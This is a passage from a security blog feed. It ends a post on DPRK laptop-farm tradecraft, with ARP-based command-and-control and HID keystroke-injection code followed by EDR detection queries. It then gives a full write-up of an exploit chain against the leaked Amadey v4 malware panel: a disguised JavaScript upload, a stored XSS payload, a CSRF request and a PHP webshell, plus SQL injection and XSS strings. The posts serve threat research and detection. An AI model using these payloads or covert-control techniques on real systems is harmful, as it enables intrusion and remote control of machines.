class="n">payload</span><span class="p">)</span> <span class="n">sniff</span><span class="p">(</span><span class="nb">filter</span><span class="o">=</span><span class="s">"arp"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">process_arp</span><span class="p">)</span> <span class="k">def</span> <span class="nf">rebroadcast_command</span><span class="p">(</span><span class="n">command</span><span class="p">):</span> <span class="n">packet</span> <span class="o">=</span> <span class="n">Ether</span><span class="p">(</span><span class="n">dst</span><span class="o">=</span><span class="s">"ff:ff:ff:ff:ff:ff"</span><span class="p">)</span> <span class="o">/</span> <span class="n">ARP</span><span class="p">(</span><span class="n">op</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span> <span class="n">hwsrc</span><span class="o">=</span><span class="n">CHANNEL_ID</span><span class="p">,</span> <span class="n">psrc</span><span class="o">=</span><span class="s">"0.0.0.0"</span><span class="p">)</span> <span class="n">sendp</span><span class="p">(</span><span class="n">packet</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="s">"eth0"</span><span class="p">)</span> </code></pre></div></div> <p><br /> That would mean the C2 would look something like this:</p> <p><img src="https://github.com/user-attachments/assets/da6e5443-f2b6-4678-89cf-f37d124c4240" alt="image" /></p> <p>In which a controller on the LAN would receive the WebSocket C2 and rebroadcast over ARP to all listeners. This would obviously require each system on LAN to have a listener also configured and subsequently execute commands. Again, keep in mind – this is happening off the enterprise network that the Operator is eventually working on, and thus – at least network-traffic wise, essentially undetectable.</p> <p><br /></p> <h3 id="conceptualizing-how-it-works">Conceptualizing How it Works</h3> <p><br /></p> <p>I spent a lot of time trying to figure out how this would work, since the writeup explicitly mentions forensics on an organization’s laptop. The writeup mentions tools specific to Linux (xdg-open and xdotool), and I was skeptical that a company was shipping out Linux distros to its remote workers.</p> <p>Trying to fit this into Windows, a laptop would need to run <a href="https://scapy.net/">scapy</a> to receive and interpret the ARP commands, which does require installation of <a href="https://npcap.com/windows-10.html">npcap</a> in order to work. Then, it would be trivial to call a python script as in the use-case, but would have to swap out xdg-open and xdotool with something like Powershell in order to work. It might look something like this:</p> <p><img src="https://github.com/user-attachments/assets/9bb551f4-90cb-4f5b-b429-f49c86095103" alt="image" /> <br /></p> <p>This didn’t look feasible to me. If a user could install npcap, it would stand to reason that they might just opt for something like AnyDesk for simplicity. This may exist in the wild as a hybridized approach, but it seems a little too wonky to make sense. The ARP listener also suggests that this laptop would also be beaconing back over WebSocket to the C2 to confirm receipt of the command. This is detectable:</p> <p><img src="https://github.com/user-attachments/assets/47a50ee6-03b5-4eda-a6d8-3da53e6e0c72" alt="image" /> <br /></p> <p>It’s also not super sophisticated. Again, this didn’t make sense. If you’re going to risk C2 detection on network, then why bother with the obfuscation that comes with Zoom screen sharing? <br /></p> <h3 id="bringing-it-all-together-back-to-the-raspberry-pis">Bringing it All Together: Back to the Raspberry Pis</h3> <p><br /></p> <p>Spoiler – here is what I was overlooking. The /dev/hidg0 portion of the code snippets is critical. In addition to the network-based control, Sygnia observed the use of USB-based HID injection. A script decoded base64-encoded input events and wrote them directly to /dev/hidg0, a Linux device interface for simulating keyboard input. This method allowed the attacker to mimic human interaction—such as accepting Zoom remote control requests—on a connected machine. All observed scripts and techniques were reportedly discovered on a laptop submitted for forensic investigation after a law enforcement raid.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">base64</span> <span class="k">def</span> <span class="nf">replay_input</span><span class="p">(</span><span class="n">encoded_event</span><span class="p">):</span> <span class="n">decoded</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">encoded_event</span><span class="p">)</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">"/dev/hidg0"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">decoded</span><span class="p">)</span> </code></pre></div></div> <p><br /></p> <p>In the original writeup, this was presented as “found on the laptop”, and that may be so, but this is highly suggestive of additional devices on the network explicitly used to control said laptops. More specifically, this python receives the base64 encoded ARP command (literally only ‘open_zoom’ or ‘approve_remote’) and writes it directly to /dev/hidg0. This kernel device interface is <em>only</em> available when USB Gadget mode is enabled. The subprocess.run() commands afterward suggest the corresponding execution for each of these commands:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">subprocess</span><span class="p">.</span><span class="n">run</span><span class="p">([</span><span class="s">"xdg-open"</span><span class="p">,</span> <span class="s">"zoommtg://zoom.us/start"</span><span class="p">],</span> <span class="n">check</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">run</span><span class="p">([</span><span class="s">"xdotool"</span><span class="p">,</span> <span class="s">"key"</span><span class="p">,</span> <span class="s">"Return"</span><span class="p">],</span> <span class="n">check</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> </code></pre></div></div> <p><br /></p> <p>Again, Linux commands. So assuming accuracy in the writeup, this had to be in a dev environment or something. Maybe I’m way out of touch, but I still can’t see corporate Linux desktops being shipped out to remote workers. That said, it does jive with the earlier look at how the C2 functions. Commands short enough to be encoded within the hwsrc field of an ARP packet would allow the operator to first broadcast ‘open_zoom’, wait, and then broadcast ‘approve_remote’ after the operator manually requests control within the Zoom meeting. Honestly, it’s clever, scalable and impossible to detect on an enterprise – as it is happening entirely on the laptop farm’s LAN. Since we’re talking about low-cost HID devices as well, this could be accomplished with cheap $10-$15 <a href="https://www.raspberrypi.com/products/raspberry-pi-zero/">Raspberry Pi Zeros.</a> Assuming multiple Operators colluding within the same LAN, this also allows everybody to start work at the same time using the same ARP rebroadcast.</p> <p>Subsequently, this does offer us an opportunity to speculate as to how this might work at scale <em>and</em> on what is likely to be a significantly larger percentage of fleet Windows machines across multiple organizations.</p> <p>Conceivably, it would look something like this on Windows, in which the two short commands to write to /dev/hidg0 would be a simple CMD run (WIN+R) to a preconfigured Zoom meeting direct-to-url, followed by a simple button press of the ENTER key:</p> <p><img src="https://github.com/user-attachments/assets/5f277f00-8fd7-469e-9283-6d4ee9065592" alt="image" /> <br /></p> <p>It is maddeningly simple and virtually indistinguishable from normal traffic. That said, this would also suggest a relatively sophisticated setup effort on the part of DPRK operators, which would need to ship multiple RasPi Zeros and MicroSDs to a laptop farm, and subsequently instruct the farmer to download (likely) preconfigured OSes to each MicroSD. These would need to be trivially preconfigured with the Python code that includes the /dev/hidg0 inputs and at least one with the WebSocket C2. From there, it’s just plug and play.</p> <p>This also aligns with the C2 design and actually suggests a certain level of redundancy. If every Pi Zero is a listener/controller but <em>is also talking to the WebSocket C2</em>, then you have multiple failovers rebroadcasting the ARP traffic to all the other controllers as well. Therefore, the C2 on LAN might look something like this: <br /> <img src="https://github.com/user-attachments/assets/cb82c532-b5ea-4d6e-b349-9a293e65d993" alt="image" /></p> <p><br /></p> <h3 id="so-whats-the-point">So What’s the Point?</h3> <p><br /></p> <p>This is obviously speculative/theoretical, but we’ve read a ton about “thousands of DPRK remote workers” and I wanted to understand how that could work at scale. This setup conceivably <em>works at scale</em>, essentially “factory farming” local facilitators in a way that leaves all indicators functionally off detectable telemetry. To defenders, this looks like a daily standup meeting for each individual user, frankly, but provides direct control to DPRK remote operators in a way that scales across an entire laptop farm in a repeatable and redundant fashion.</p> <p><br /></p> <h3 id="and-is-it-detectable">And Is It Detectable?</h3> <p><br /></p> <p>Honestly.. yes? Kind of? If the Sygnia code is consistent across this operation, the usage of the direct-to-url <em>zoommtg://</em>, especially if run from the Run dialog, is something to key in on. Further, there are some methods to follow-up on that Zoom launch to see if the meeting remains persistent for a full day. I won’t go through all the tools for all this, but to use some simple SQL and Crowdstrike as an example:</p> <p><strong>What to Look For in EDR (e.g., CrowdStrike Falcon):</strong></p> <p><strong>1. Zoom URI Invocation (zoommtg://…) via Run Dialog</strong></p> <ul> <li>If the HID device simulates Win+R followed by zoommtg://…: <ul> <li><strong>CrowdStrike would likely log this as a cmd.exe-less user shell invocation</strong> or explorer.exe launching a URI.</li> <li>Look for child processes of explorer.exe or RuntimeBroker.exe without a parent cmd.exe.</li> </ul> </li> </ul> <p><br /> <strong>2. Foreground Window Change / Shell Execution</strong></p> <ul> <li>EDRs often capture shell execution events, even if no binary is dropped.</li> <li>The HID input will make Zoom the foreground app — this may be correlated with a zoom.exe process spawning immediately after an untyped shell interaction.</li> </ul> <p><br /> <strong>3. Unusual Input Sequences</strong></p> <ul> <li>If the HID device is used <strong>without the user’s interaction</strong>, the pattern of keystrokes (e.g., Win+R, short delay, URI, Enter) could look anomalous: <ul> <li>Especially if it happens consistently at the same time.</li> <li>Or if it happens when the user is marked as inactive.</li> </ul> </li> </ul> <p><br /> <strong>4. Zoom Process Activity</strong></p> <ul> <li>CrowdStrike will definitely track zoom.exe execution: <ul> <li>If it runs with unusual parent-child relationships (e.g., no clear originating app or script).</li> <li>Or if it happens without any keyboard or mouse input from a real user.</li> </ul> </li> </ul> <p><br /> <strong>Detection Strategy Example (Pseudo Falcon Query Syntax)</strong> <br /></p> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">event_type</span><span class="o">=</span><span class="n">ProcessRollup2</span> <span class="o">|</span> <span class="n">filter</span> <span class="p">(</span><span class="n">ImageFileName</span><span class="o">=</span><span class="nv">"zoom.exe"</span> <span class="k">OR</span> <span class="n">CommandLine</span> <span class="k">CONTAINS</span> <span class="nv">"zoommtg://"</span><span class="p">)</span> <span class="o">|</span> <span class="n">filter</span> <span class="n">ParentImageFileName</span><span class="o">=</span><span class="nv">"explorer.exe"</span> <span class="o">|</span> <span class="n">filter</span> <span class="k">NOT</span> <span class="n">CommandLine</span> <span class="k">CONTAINS</span> <span class="nv">"C:</span><span class="se">\\</span><span class="nv">Program Files</span><span class="se">\\</span><span class="nv">Zoom</span><span class="se">\\</span><span class="nv">bin</span><span class="se">\\</span><span class="nv">Zoom.exe"</span> <span class="o">|</span> <span class="n">filter</span> <span class="n">Timestamps</span> <span class="n">WITHIN</span> <span class="n">user_inactive_window</span> </code></pre></div></div> <p><br /> This would help isolate Zoom executions that:</p> <ul> <li>Were likely triggered by shell input (vs a Zoom shortcut or scheduled meeting).</li> <li>Occurred when there was no recent user interaction (suggesting automation or HID input). <br /> You can extend this strategy further by comparing the launches over time as well. Conceivably, your DPRK operator is going to be running this daily – first thing every morning, so mapping the Run dialog launch against the timestamps may reveal daily launches using the same automation, like so:</li> </ul> <p><br /></p> <div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">event_platform</span><span class="o">=</span><span class="nv">"Win"</span> <span class="o">|</span> <span class="n">event_type</span><span class="o">=</span><span class="nv">"ProcessRollup2"</span> <span class="o">|</span> <span class="n">ImageFileName</span><span class="p">:</span><span class="k">contains</span><span class="o">=</span><span class="nv">"</span><span class="se">\\</span><span class="nv">Zoom.exe"</span> <span class="o">|</span> <span class="n">CommandLine</span><span class="p">:</span><span class="k">contains</span><span class="o">=</span><span class="nv">"zoommtg://"</span> <span class="o">|</span> <span class="n">ParentImageFileName</span><span class="o">=</span><span class="nv">"explorer.exe"</span> <span class="o">|</span> <span class="k">NOT</span> <span class="n">CommandLine</span><span class="p">:</span><span class="k">contains</span><span class="o">=</span><span class="nv">"chrome.exe"</span> <span class="o">|</span> <span class="k">NOT</span> <span class="n">CommandLine</span><span class="p">:</span><span class="k">contains</span><span class="o">=</span><span class="nv">"firefox.exe"</span> <span class="o">|</span> <span class="k">NOT</span> <span class="n">CommandLine</span><span class="p">:</span><span class="k">contains</span><span class="o">=</span><span class="nv">"msedge.exe"</span> <span class="o">|</span> <span class="k">NOT</span> <span class="n">ParentCommandLine</span><span class="p">:</span><span class="k">contains</span><span class="o">=</span><span class="nv">"Zoom.exe"</span> <span class="o">|</span> <span class="k">NOT</span> <span class="n">ParentImageFileName</span> <span class="k">IN</span> <span class="p">(</span><span class="nv">"chrome.exe"</span><span class="p">,</span> <span class="nv">"firefox.exe"</span><span class="p">,</span> <span class="nv">"msedge.exe"</span><span class="p">)</span> <span class="o">|</span> <span class="n">DeviceUserName</span><span class="o">!=</span><span class="nv">"SYSTEM"</span> <span class="o">|</span> <span class="n">fields</span> <span class="n">DeviceName</span><span class="p">,</span> <span class="n">DeviceUserName</span><span class="p">,</span> <span class="nb">Timestamp</span><span class="p">,</span> <span class="n">CommandLine</span> <span class="o">|</span> <span class="n">groupby</span> <span class="n">DeviceName</span><span class="p">,</span> <span class="n">DeviceUserName</span> </code></pre></div></div> <p><br /></p> <p>So that will give you non-standard Run dialog Zoom launches over time, which is odd enough considering the average user is going to open the UI and launch their meetings, or click a link (which tends to be https:// in meeting invites). The only other odd behavioral indicator with these meetings is their length – operators are going to be screen-share remote-controlling all day long. So once you have your list of possibles, there’s Powershell you can run on them periodically throughout the day:</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-Process</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">$</span><span class="n">\_.MainWindowHandle</span><span class="w"> </span><span class="o">-ne</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">Name</span><span class="p">,</span><span class="w"> </span><span class="nx">Id</span><span class="p">,</span><span class="w"> </span><span class="nx">MainWindowTitle</span><span class="w"> </span></code></pre></div></div> <p><br /></p> <p>This will give you all active apps with visible windows. Thus, a Zoom meeting lasting all day long will always be active. You can script this to loop a bunch of times for more data points – but this is still arguably imperfect.</p> <p><br /></p> <h3 id="back-to-that-hardware-detection">Back to that Hardware Detection</h3> <p><br /></p> <p>That hardware detection way back up there ^^ with ARP tables is useful here. If the setup is using these Pi Zeros, the detection strategies for EDR or the simple Powershell (repeated here) will be handy:</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">arp</span><span class="w"> </span><span class="nt">-a</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-String</span><span class="w"> </span><span class="s1">'04-C9-8B|B8-27-EB|28-CD-C1|D8-3A-DD|DC-A6-32|E4-5F-01|2C-CF-67|3A-35-41|88-A2-9E'</span><span class="w"> </span></code></pre></div></div> <p><br /> <img src="https://github.com/user-attachments/assets/22b10f65-73d3-482c-a5fa-fe30eee0c08e" alt="image" /> <br /></p> <p><br /></p> <h1 id="wrapping-it-all-up">Wrapping it All Up</h1> <p><br /></p> <p>Okay so that just kept going. WAY longer than I anticipated, but I wanted to do my best at an authoritative guide. Ultimately, the detection of DPRK-linked laptop farms and remote worker schemes requires defenders to look beyond traditional indicators of compromise and start asking different questions—about infrastructure, behavior, and access. These campaigns aren’t just about malware or phishing; they’re about deception at scale, often executed in ways that blend seamlessly with legitimate remote work. By combining endpoint telemetry, LAN observations, hardware footprinting, and creative pivots like BSSID geolocation or ARP sniffing, we can begin to expose patterns that might otherwise go unnoticed. This isn’t about catching every instance—it’s about shrinking the haystack, understanding the tradecraft, and spotting the anomalies that point to something bigger.</p> <p><img src="http://canarytokens.com/feedback/terms/about/11ioj97mxzheaan14j5071o5r/contact.php" style="display: none;" /></p>
  122. Deep Diving Amadey Source Code

    Tue, 25 Mar 2025 00:00:00 -0000

    Well, since it doesn’t work anymore I might as well write it up. A few other folks are aware of this and have written on it – notably R3V3RS3R and the indomitable Vangelis Stykas – but I thought I’d throw my hat in the ring as well regarding how Amadey v4 was super sploit-able and how one could theoretically do something like that. Since they are now on v5 and this seems to have been fixed, here’s the goods.
    <p>Well, since it doesn’t work anymore I might as well write it up. A few other folks are aware of this and have written on it – notably <a href="https://r3v3rs3r.wordpress.com/2024/08/30/all-your-loaders-suck-until-further-notice/">R3V3RS3R</a> and the indomitable <a href="https://stykas.com/">Vangelis Stykas</a> – but I thought I’d throw my hat in the ring as well regarding how Amadey v4 was super sploit-able and how one could theoretically do something like that. Since they are now on v5 and this seems to have been fixed, here’s the goods.</p> <p>I also recommend Stykas’ <a href="https://www.youtube.com/watch?v=fMxSRFYXMV0">DEFCON 31</a> talk, where this is done at a much larger scale and initially served as the inspiration for this exercise.</p> <p><img src="https://github.com/user-attachments/assets/3f5c81f4-ca83-418d-85e8-0545091354a2" alt="image" /></p> <p><br /> <strong>Background</strong></p> <p>Amadey is a <a href="https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html">lightweight but persistent malware strain originally observed in the wild around early 2018</a>. Designed primarily as a loader, it has evolved over time into a more versatile stealer, often serving as a second-stage tool in multi-pronged intrusion campaigns. Its compact codebase and modular design make it attractive to threat actors operating commodity malware campaigns, especially in conjunction with other malware like SmokeLoader, RedLine, or Raccoon. Amadey typically facilitates the silent installation of additional payloads, command execution, the collection of basic system reconnaissance data, and the exfiltration of browser-stored credentials and files of interest.</p> <p>Throughout its evolution, Amadey has maintained a low profile, favoring stealth and simplicity over flashy capabilities. While not as well-known in mainstream threat reporting as major info-stealers like Vidar or Agent Tesla, it has quietly persisted in cybercrime ecosystems, often distributed through exploit kits, malicious spam campaigns, and cracked software bundles. It’s also <a href="https://www.microsoft.com/en-us/security/blog/2024/12/11/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine/">shown up in APT campaigns</a>, <a href="https://socprime.com/blog/secret-blizzard-attack-detection/">notably SECRET BLIZZARD in late 2024</a>. Its C2 communications have historically relied on plaintext HTTP, making it easy to analyze but also trivial for actors to repurpose or host on low-cost infrastructure. Despite its minimal footprint, Amadey’s success lies in its reliability and ease of customization for cybercriminals.</p> <p><br /> <strong>Features</strong></p> <p>I certainly recommend <a href="https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-amadey-56c8c6ea0ad6">g0njxa’s interview</a> with Amadey’s creator, InCrease. About 500 bucks in the right forums and it’s yours.</p> <p>As a Loader, Amadey’s primary purpose is to maintain C2 and spin up new tasks for the infected system to execute. This can be .exe install, .ps1, .dll, etc. When the infected system checks in, it will check for new tasks and execute any new ones.</p> <p><img src="https://github.com/user-attachments/assets/eb4c9768-8f55-4c27-b7d6-e43df5d1bff3" alt="image" /></p> <p>There’s also an add-on Credentials feature (Show_Cred.php) that will house stolen browser-based credentials and the like. Remember that – it comes in handy later.</p> <p><br /> <strong>The Leak</strong></p> <p>In May 2024, the complete source code of Amadey v4 was <a href="https://x.com/vxunderground/status/1788391188078231764?lang=en">leaked</a> on an underground forum, providing rare insight into the malware’s internals and development practices. It’s currently <a href="https://github.com/vxunderground/MalwareSourceCode/blob/main/Panel/Panel.Amadey.d.c.7z">available on vxunderground’s GitHub</a>. The leak includes the builder, panel code, and client source—offering a full end-to-end look at how the malware is deployed, operated, and monetized. Unlike earlier versions, v4 introduces several enhancements aimed at evasion and scalability, including improved bot tracking, updated injection routines, and a refactored panel written in PHP. The leak has since circulated widely, and has already led to the creation of forked variants and clones, some of which have begun appearing in active campaigns.</p> <p>In the rest of this post, I’ll dive into the leaked Amadey v4 source code as a demonstration of a fun little known about C2 frameworks – Blue Teams tend to inherently know that two-way communication comes with vulnerability. Shoddy C2 is no exception. I suppose this could also serve as a demonstration of a code audit (lol) – though that is not something I would consider myself any good at.</p> <p><br /> <strong>Index.php</strong></p> <p>Let’s start with the main piece. Index.php is generally the C2 mechanism in which infected systems will beacon. Analysts can find system information and other data passed within the packet body.</p> <p><img src="https://github.com/user-attachments/assets/c11c9196-2988-4e91-a01e-c55309f17a8d" alt="image" /></p> <p>So this is the main input for data to the C2 web app, so there’s probably some good stuff in here. First, one might suspect (and they’d be correct) that there’s SQL Injection vulnerabilities all over the place.</p> <p><img src="https://github.com/user-attachments/assets/99e17c27-97e4-4ff9-b747-79fd861e6644" alt="image" /></p> <p>Here, if $taskid is crafted as ‘ OR 1=1 –, it could manipulate the query.</p> <p><img src="https://github.com/user-attachments/assets/4975f5b9-6c11-4f3c-b55d-eae908c8e609" alt="image" /></p> <p> If $unit_id is malicious (e.g., ‘ OR ‘1’=’1), it could leak all tasks.</p> <p>But perhaps most predictably, there’s no input validation for much of the C2 data inbound. This makes sense, considering the C2 is optimized to accept anything for operator usability.</p> <p><img src="https://github.com/user-attachments/assets/13f7aec6-4667-449e-a8c3-89eba0aca28e" alt="image" /></p> <p>In this case, one could theoretically send a POST request with any file disguised as a JPG. Pin this concept, as it’s a reoccurring theme.</p> <p><img src="https://github.com/user-attachments/assets/55cf8309-21f7-48bd-8698-75df5a3669de" alt="image" /></p> <p>Likewise, here with TAR files, which (I think) are specific to Session data. More on this one later.</p> <p><img src="https://github.com/user-attachments/assets/95df24e8-fbe0-4aaa-80ff-bca511a9337a" alt="image" /></p> <p>Amadey prevents infection in CIS countries like a number of other malware strains by design, but this portion of index.php can bypass that. By trusting the HTTP_X_FORWARDED_FOR, an attacker could theoretically fake their IP to bypass this or load fake data. In short:</p> <ul> <li>The script <strong>does not validate admin sessions</strong> before processing requests.</li> <li><strong>Exploit</strong>: Anyone can submit malicious data to: <ul> <li>Add fake bots (POST[“r”]).</li> <li>Inject stolen credentials (POST[“cred”]).</li> <li>Manipulate task execution (POST[“e0”], POST[“d1”]).</li> </ul> </li> </ul> <p>And finally, another example of lack of input validation, POST “cred” is designed to collect browser credentials, and (notably) checks to make sure the id parameter is exactly 12 characters long. If it is, it parses the contents of the cred parameter by calling Parse_Credentials().</p> <p><img src="https://github.com/user-attachments/assets/1051d861-ca6f-4bfb-b0df-9eb36d7d2ac3" alt="image" /></p> <p>Nice. Stored XSS, potentially. Under the right circumstances, one could theoretically inject HTML or JavaScript that would be stored on the backend. Let’s remember that too.</p> <p><br /> <strong>Login.php</strong></p> <p>I took a look at the primary login page, though that didn’t give me much that was useable. I’ll run through it anyway just so it’s written down.</p> <p>Maybe not unexpected, there’s no rate limiting on logins, so brute-force away.</p> <p><img src="https://github.com/user-attachments/assets/15eccafe-db08-4bfd-a490-799dd76b05e5" alt="image" /></p> <p>Less useful, there’s no session ID regeneration after login, so in the off-chance an attacker intercepts it via any frankly unrealistic scenario, they’d be able to log in as the operator.</p> <p><img src="https://github.com/user-attachments/assets/fc13f495-5558-4442-9aa0-a7f8b79cdd7d" alt="image" /></p> <p>Similarly unrealistic (but also elsewhere throughout the webapp), there’s examples of Reflected XSS in which an attacker could craft a malicious link to send to the operator (e.g. <code class="language-plaintext highlighter-rouge">login.php?l=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;p=test</code>)</p> <p><img src="https://github.com/user-attachments/assets/d845160f-cd9d-4789-805e-bf19a38bb018" alt="image" /></p> <p><br /> <strong>Settings.php</strong></p> <p>This is less interesting but there’s an important piece in here so I’ll cover it briefly. It goes without saying that all of Settings.php requires an authenticated user for any interaction:</p> <p><img src="https://github.com/user-attachments/assets/927bc53c-5065-432c-987f-fff00ec3a22d" alt="image" /></p> <p>This probably explains why there’s no input sanitization literally anywhere here. The idea is that the operator would be logged in, and then Settings could be tweaked by said authenticated operator. Makes sense.</p> <p>It’s not always clear which POST actions are referenced or re-rendered in the panel, but several — like the wallets update handler — appear to take user-supplied input with no sanitization. If any of these fields are later inserted into the HTML (for example, into a &lt;input value=”…“&gt;), they present a strong vector for stored XSS. This includes the cryptocurrency wallet fields, which can be overwritten with payloads that will execute when the admin revisits the Settings page.</p> <p><img src="https://github.com/user-attachments/assets/29e18dce-89c3-4eb5-9111-d8905f79acae" alt="image" /></p> <p>Much like SyncTime. This setting allows the operator to set how often the infected system checks in, but the field accepts arbitrary strings. There’s zero input validation, no encoding, and no length restrictions. You can drop in a full &lt;script&gt; tag, base64 payload, or even attempt PHP injection – but it does require an authenticated user to get there.</p> <p><img src="https://github.com/user-attachments/assets/c8dc9b50-74bc-4335-8542-d9ed82d51984" alt="image" /></p> <p><img src="https://github.com/user-attachments/assets/571ae2c9-22bc-469f-b7d4-de08cf0530eb" alt="image" /></p> <p>So wait – I can also just.. <strong>write whatever I want to sync.php</strong>? Yes… you could theoretically do that.</p> <p>Let’s recap on the most relevant stuff briefly before I move into closing this thing out. <br /></p> <ul> <li>Index.php will let us push arbitrary files to the C2 (GET wal) as long as we throw a .tar on the end.</li> <li>Index.php will let us push arbitrary data to the C2 (POST cred) as long as we throw a 12 character ID on it.</li> <li>If we can get an authenticated user to write to sync.php, we could throw whatever we want in there.</li> </ul> <p><br /> <strong>Show_Cred.php</strong></p> <p><img src="https://github.com/user-attachments/assets/77bad8b4-4487-4967-b6f1-2488ea3a41e2" alt="image" /></p> <p>LOL, okay then….. POST cred shows up here (notice the “id” field as the first column). Again, no input validation. So in theory.. one could push XSS via the POST request, it show up here and it will trigger upon page view.</p> <p><br /></p> <ul> <li>Perhaps it could trigger a malicious file elsewhere on the server.</li> <li>Perhaps that malicious file was say, JavaScript but had a .tar appended on the end of it.</li> <li>Perhaps that JavaScript forced arbitrary write to sync.php, where anything goes.</li> <li>Perhaps it’s a web shell.</li> </ul> <p><br /> <strong>The Exploit Chain</strong></p> <p>This is for educational and threat intelligence purposes only, hacking is illegal and all that. This doesn’t work anymore anyway, er.. so I’ve heard. Anyway –</p> <p>Step 1.) First, we take advantage of missing content validation in index.php:</p> <pre><code> if ($\_GET\["wal"\]) { if (strcasecmp(GetFileExtension($\_FILES\['data'\]\['name'\]), 'tar') == 0) { move_uploaded_file($\_FILES\['data'\]\['tmp_name'\], './Sessions/' . substr(GetFileName($\_FILES\['data'\]\['name'\]) , 0, 32) . '.tar') or die(''); } exit; } </code></pre> <p><br /></p> <p>This lets us send a GET /index.php?wal=1 with a file upload where the extension is .tar, <strong>but the contents are actually malicious JavaScript</strong>. We name it something like .tar (just .tar with no basename) to control how it gets referenced later.</p> <p>The payload inside that .tar (really a .js) is:</p> <pre><code> fetch("/settings.php", { method: "POST", body: "sync=1&amp;SyncTime=&lt;?php system($\_GET\[\\"cmd\\"\]); ?&gt;", credentials: "include" }); </code></pre> <hr /> <p><br /> This JavaScript abuses the fact that settings.php accepts arbitrary POST input for SyncTime <strong>without any sanitization</strong>: <br /></p> <pre><code> if (isset($\_POST\["sync"\])) { SaveSyncTime($\_POST\["SyncTime"\]); die; } </code></pre> <p><br /></p> <p>SaveSyncTime() writes this raw value directly into Cfg/Sync.php, which is then executable as PHP. This gives us a classic webshell at /Cfg/Sync.php?cmd=….</p> <p>Step 2.) But as we’ve established… the JS doesn’t run by itself — we need a way to <strong>execute it within the operator’s browser</strong>.</p> <p>So we exploit a separate issue — <strong>a stored XSS injection</strong> — also in index.php:</p> <pre><code> if ($\_POST\["cred"\]) { if (strlen($\_POST\["id"\]) == 12) { Parse_Credentials($\_POST\["cred"\], ':::'); } exit; } </code></pre> <p><br /></p> <p>This lets us send a POST request like:</p> <p><code class="language-plaintext highlighter-rouge">cred=&lt;script src="./Sessions/.tar"&gt;&lt;/script&gt;&amp;id=86753091234</code></p> <p>That cred value is ultimately passed through to the database (via AddToCredBase) <strong>with no HTML escaping or validation</strong>, and then rendered raw in show_cred.php:</p> <p><br /></p> <pre><code> echo "&lt;td&gt;" . $row\['login'\] . "&lt;/td&gt;"; </code></pre> <p><br /></p> <p>So when the C2 operator views show_cred.php, the XSS is triggered, and our uploaded .js file (disguised as a .tar) gets loaded and executed in their browser.</p> <p>Because the operator is already authenticated, the script executes a <strong>CSRF-style POST</strong> to settings.php, which writes our PHP payload into sync.php.</p> <p><br /> <strong>🔗 Chain Summary</strong></p> <ol> <li><strong>Upload fake .tar file</strong> (actually JS) via ?wal=1 → saved as /Sessions/.tar.</li> <li><strong>Inject stored XSS</strong> using cred=&lt;script src=”./Sessions/.tar”&gt;&lt;/script&gt;.</li> <li><strong>Wait for operator to view show_cred.php</strong>, triggering the XSS.</li> <li><strong>Malicious JS runs</strong>, CSRF-posts PHP payload to settings.php.</li> </ol> <p><strong>Sync.php is overwritten</strong> with attacker-controlled PHP → fully functional webshell. All possible with a couple curl commands.</p> <p><br /> Here’s a fancy diagram that hopefully better illustrates it:</p> <p><img src="https://github.com/user-attachments/assets/54877d74-0278-44f1-950c-0ad35f39fe0b" alt="image" /></p> <p><img src="http://canarytokens.com/terms/about/stuff/c42dqcyxs95m78f335k5z2xnt/contact.php" style="display: none;" /></p>
  123. A History of GraphAPI Attacks

    Fri, 07 Feb 2025 00:00:00 -0000

    When Graphs Go Bad: Adversarial Use of Microsoft Graph API for C2 and Evasion
    <p><strong>When Graphs Go Bad: Adversarial Use of Microsoft Graph API for C2 and Evasion</strong></p> <p>Microsoft Graph API is the backbone of modern Microsoft 365 environments — a single interface to access and manipulate data across services like OneDrive, Outlook, Azure AD, and Teams. It’s what makes the Microsoft cloud ecosystem so powerful for developers and administrators alike. But that same power and ubiquity also make Graph API an incredibly appealing vector for threat actors.</p> <p><img src="https://github.com/user-attachments/assets/c4ff7e59-3953-4906-ac27-e7e0f25150c5" alt="image" /></p> <p>Consolidation around cloud-first infrastructure, particularly in government and large commercial, incentivizes adversary usage of cloud-native functions. Frankly, we are increasingly seeing cloud-only events that don’t bother with on-premises compromises at all. Why bother when the desired data is in the cloud in the first place? And – when your tactics blend in with the rest of the cloud’s legitimate activity?</p> <p>Over the last few years, sophisticated adversaries — including the “big four” nation-state actors — have increasingly baked Microsoft Graph into their post-compromise playbooks. By using Graph for command-and-control (C2), reconnaissance, persistence, and even exfiltration, they blend malicious traffic into legitimate cloud workflows. And because Graph API usage is expected and noisy in cloud-first organizations, defenders are often flying blind.</p> <p>Once again, there’ s quite a lot of ink spilled covering individual incident post-mortems, but not much in the way of throughline analysis that captures how a tactic or technique can move and change as the years go by. This post explores the methods, tools, and procedures threat actors are using to 